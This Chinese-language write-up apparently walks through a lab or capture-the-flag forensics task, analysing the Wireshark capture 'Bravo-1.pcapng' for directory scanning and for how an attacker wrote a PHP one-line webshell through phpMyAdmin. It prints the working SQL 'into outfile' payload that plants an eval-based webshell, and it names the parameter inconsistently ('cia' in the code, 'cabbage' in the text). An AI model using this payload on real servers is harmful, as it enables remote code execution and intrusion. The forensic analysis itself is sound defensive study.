Wireshark分析：Bravo-1数据包中的恶意活动与目录扫描

"03-详细解析过程-bravo-1.docx" 在网络安全和数据包分析领域，Wireshark是一款强大的工具，用于捕获和分析网络流量。在这个特定的任务中，我们关注的是一个名为"Bravo-1"的数据包文件，即"Bravo-1.pcapng"。该文件包含了一次渗透测试或模拟攻击的情景，其中渗透机是运行Windows7的系统，用户名为"administrator"，密码为"123456"。 首先，我们需要找到恶意用户进行目录扫描时的第二个目录名。通过对数据包进行过滤并专注于HTTP流量，我们可以观察到"info"列中的目录列表，尤其是那些返回404 Not Found响应的请求。这通常意味着攻击者正在尝试访问不存在的路径。在本例中，找到的第二个目录名是"uploads"，这可能是攻击者试图探测的潜在弱点。 接着，我们要确定恶意用户是如何写入一句话木马的。通过追踪TCP流，我们可以区分发送和接收的包。在绿色的接收包中，我们注意到与"phpmyadmin"相关的活动。通过分析数据包内容，特别是寻找POST请求，我们发现了一个SQL注入攻击的痕迹。攻击者使用了如下的SQL语句： ```sql select '<?php@eval($_POST[cia]);?>' into outfile 'c:/phpstudy/www/m/shell2.php' ``` 这表明恶意代码被写入了路径"c:/phpstudy/www/m/shell2.php"。此操作是通过访问"phpmyadmin"目录下的"server_sql.php"文件来完成的。执行的SQL语句会创建一个PHP文件，当接收到POST请求时，它会执行通过 cabbage 参数传递的任何PHP代码。 此外，还可以通过过滤器"http.request.method==POST"来查找可疑活动，这帮助我们找到了名为"shell2.php"的文件，其数据区包含了木马代码。另一个包显示了通过"/phpmyadmin/import.php"文件执行的SQL语句注入，也写入了木马文件。 "Bravo-1.pcapng"文件分析揭示了两个关键点：一是恶意用户使用目录扫描技术尝试访问"uploads"目录；二是攻击者利用SQL注入在"c:/phpstudy/www/m/"目录下写入了一句话木马"shell2.php"，主要通过"phpmyadmin"目录的"server_sql.php"和"import.php"文件实现。这些信息对于理解网络攻击的模式以及防御策略至关重要。